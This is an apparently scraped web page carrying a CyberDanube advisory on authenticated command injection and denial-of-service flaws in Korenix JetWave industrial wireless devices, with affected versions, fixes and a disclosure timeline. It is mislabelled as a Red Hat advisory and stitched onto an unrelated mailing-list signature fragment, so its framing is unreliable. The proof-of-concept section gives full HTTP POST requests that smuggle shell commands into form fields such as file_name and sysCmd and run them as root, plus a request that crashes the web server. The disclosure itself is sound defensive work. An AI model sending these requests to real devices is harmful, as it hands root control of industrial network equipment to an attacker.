7Q5sp6ybngKDTLyzZJwvj/NfVuNqtkhcOXhFDeeoUjsj4ONV0PZakKj2FJfP464J  
JfLnyufhgfy03D4CbLqSeQxV9hPwW4CyQ5h46/zLtqKe06yh8LAf8fDsnkayk2h2  
I4xdIehgw1txDh8RO2d43y5i2DnSjNmacWhxWy38bNdRGxPUF36pnfjuG9T83Gw4  
iLaPQEeIVD/7692QNZO8cGntLtZoM7TkfwPAEEth3QC9JGM+TLtl2YwXQQWtxTNU  
wCGZORPJZyw=  
=sByk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0651-01

Multiple versions of Korenix JetWave suffer from authenticated command injection and denial of service vulnerabilities.

    CyberDanube Security Research 20230213-0-------------------------------------------------------------------------------                 title| Multiple Vulnerabilities               product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S,                      | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L,                      | JetWave 2414/2114, JetWave 2424, JetWave 2460,                      | JetWave 3220/3420 V3    vulnerable version| See "Vulnerable Versions"         fixed version| See "Solution"            CVE number| requested                impact| High              homepage| https://korenix.com/                 found| 2022-11-28                    by| S. Dietz, T. Weber (Office Vienna)                      | CyberDanube Security Research                      | Vienna | St. Pölten                      |                      | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.[...]Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwidecustomer base covers different Sales channels, including end-customers, OEMs,system integrators, and brand label partners."Source:https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable Versions:-------------------------------------------------------------------------------The following firmware versions have been found to be vulnerable byCyberDanube:  * Korenix JetWave4221 HP-E <= V1.3.0  * Korenix JetWave 3220/3420 V3 < V1.7The following firmware versions have been identified to be vulnerable by thevendor:  * Korenix JetWave 2212G V1.3.T  * Korenix JetWave 2212X/2112S V1.3.0  * Korenix JetWave 2211C < V1.6  * Korenix JetWave 2411/2111 < V1.5  * Korenix JetWave 2411L/2111L < V1.6  * Korenix JetWave 2414/2114 < V1.4  * Korenix JetWave 2424 < V1.3  * Korenix JetWave 2460 < V1.6Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.2) Authenticated Denial of Web-ServiceWhen logged in, a user can issue a POST request such that the underlying binaryexits. The Web-Service becomes unavailable and cannot be accessed until thedevice gets rebooted.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command Injection1.a)The command "touch /tmp/poc" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formTFTPLoadSave HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 127Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/mgmtsaveconf.aspCookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45Upgrade-Insecure-Requests: 1submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit=============================================================================== The command gets executed as root and a file under the folder /tmp/ is created.1.b)The command "touch /tmp/poc2" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formSysCmd HTTP/1.1Host: 172.16.0.38Content-Type: application/x-www-form-urlencodedConnection: closeReferer: 172.16.0.38Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bbContent-Length: 40sysCmd=touch%20/tmp/poc2&submit-url================================================================================The command gets executed as root and a file under the folder /tmp/ is created.Command output is written into /tmp/syscmd.2) Authenticated Denial of Web-ServiceThe process goahead chrashes when the following POST request is sent to theendpoint /goform/formDefault:===============================================================================POST /goform/formDefault HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/toolping.aspCookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356Upgrade-Insecure-Requests: 1PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping=============================================================================== The output was observed on the terminal using our emulated instance:=============================================================================== rm: invalid option -- /BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binaryUsage: rm [OPTION]... FILE...Remove (unlink) the FILE(s).  You may use '--' toindicate that all following arguments are non-options.Options:     -i        always prompt before removing each destination     -f        remove existing destinations, never prompt     -r or -R    remove the contents of directories recursivelykillall: wlwatchdog: no process killedkillall: wlapwatchdog: no process killed=============================================================================== The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Owner of these products are suggested to update to the following versions:  * Korenix JetWave 4221 HP-E V1.4.0  * Korenix JetWave 2212G V1.10  * Korenix JetWave 2212X/2112S V1.11  * Korenix JetWave 2211C V1.6  * Korenix JetWave 2411/2111 V1.5  * Korenix JetWave 2411L/2111L V1.6  * Korenix JetWave 2414/2114 V1.4  * Korenix JetWave 2424 V1.3  * Korenix JetWave 2460 V1.6  * Korenix JetWave 3220/3420 V3 V1.7Recommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Korenix to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by             the vendor. The vendor planned to fix the vulnerabilities in the             next 1.5 months.2023-01-04: Contact shared the updated firmware version. CyberDanube checked             if the vulnerabilities got fixed. The contact communicated that             not only JetWave4221 is vulnerable to these issues. Therefore,             CyberDanube postponed the release of the Advisory until the other             products have been patched.2023-01-30: Meeting with Beijer Electronics. Customer get informed about the             issues. Fixes got published. Disclosure date got shifted to             2023-02-13 to provide a time-window for patching.2023-02-13: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2023

Tag

#mac